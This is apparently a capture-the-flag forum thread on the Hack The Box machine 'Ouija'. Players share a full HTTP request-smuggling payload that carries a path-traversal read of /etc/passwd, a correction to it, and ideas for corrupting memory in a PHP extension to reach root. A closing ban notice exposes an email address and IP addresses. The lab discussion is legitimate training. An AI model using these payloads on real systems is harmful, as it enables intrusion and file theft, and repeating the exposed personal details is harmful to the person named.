[greenSheep12]

http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git

Did you find it with fuzzing or was it written somewhere? 


Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt  but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.

also "gitea" has position > 50000

[YourLocalW1zard]

http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git

Did you find it with fuzzing or was it written somewhere? 


Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt  but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.

also "gitea" has position > 50000

I have the same question, how did they find the gitea?

[Dtom]

http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git

Did you find it with fuzzing or was it written somewhere? 


Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt  but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.

also "gitea" has position > 50000

I have the same question, how did they find the gitea?

see source
http://ouija.htb/

you will find

src="http://gitea.ouija.htb/leila/ouija-htb/js/tracking.js?_=0183747482"eila/ouija-htb/js/tracking.js?_=0183747482""" src="http://gitea.ouija.htb/leila/ouij" src="http://gitea.ouija.htb/leila/ouija-htb/js/tracking.js?_=0183747482""
a-htb/js

[tshakh9]

Can anyone provide assistance with http smuggling? I tried this:

POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76

GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb

but i got just the default page with no error.
I count the content length from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1

here is the picture of my request https://ibb.co/Hgn1YXG

[4ip0k]

Can anyone provide assistance with http smuggling? I tried this:

POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76

GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb

but i got just the default page with no error.
I count the content lenght like from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1

here is the picture of my request https://ibb.co/Hgn1YXG

you need to adjust the size `Content-Length`

[mur]

The url is http://dev.ouija.htb/editor.php…. you had a mistake here.
The content-length is wrong, in this topic you have a python script that could help you

1701749935[/url]']
Can anyone provide assistance with http smuggling? I tried this:

POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76

GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb

but i got just the default page with no error.
I count the content lenght like from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1

here is the picture of my request https://ibb.co/Hgn1YXG

[tshakh9]

The url is http://dev.ouija.htb/editor.php…. you had a mistake here.
The content-length is wrong, in this topic you have a python script that could help you

1701749935[/url]']
Can anyone provide assistance with http smuggling? I tried this:

POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76

GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb

but i got just the default page with no error.
I count the content lenght like from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1

here is the picture of my request https://ibb.co/Hgn1YXG

Which script? or can u tell me how to set content-length correctly ?

[deathfrom2]

So in order to get root we need to use the
                        /usr/lib/php/20220829/lverifier.so

Which is part of the bigger picture running on port 9999 that can be found inside
                      /development/server-management_system_id_0

Analyzing lverifier.so with Ghidra, I think the end result, as function load_users states, would be reading the /etc/shadow file

So we need to make use of memory corruption in the username input field

Quick summary I guess

I see the area of code you are referring to, no idea how to exploit it

[yivador274]

So in order to get root we need to use the
                        /usr/lib/php/20220829/lverifier.so

Which is part of the bigger picture running on port 9999 that can be found inside
                      /development/server-management_system_id_0

Analyzing lverifier.so with Ghidra, I think the end result, as function load_users states, would be reading the /etc/shadow file

So we need to make use of memory corruption in the username input field

Quick summary I guess

Not quite.
/etc/shadow is reading after check username input. 
And read of /etc/shadow dont lead you to root (if password is strong)
I think it 2 possible options
The most probably 1. Corrupt the path to log file (default is /var/log/lverifier.log). There is a very strange code to take that variable. So you can corrupt this name by lenght of username. And the content to write to this file (default is session=1:user=root:version=beta:type=testing). But this string has the same very strange code to take this string from memory. And it can be corrupted to by the lenght of username input.
So my idea is try to corrupt both of string (path and content) to our controllable strings.  in this way i only can write trash filenames with some trash part of random memory.
Less possible imho 2. Try to get buffer overflow and run OS cmd in context of php under root. In this way i only can achieve the segment fall.

[iagree1337]

seems a really difficult box, author said "1h30 to root" xd

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scammer. Email Address: kevindurifda@gmail.com Registration IP: 46.18.99.42 Last Known IP: 2001:861:3dc6:de60:b92b:2e08:ec4a:94f5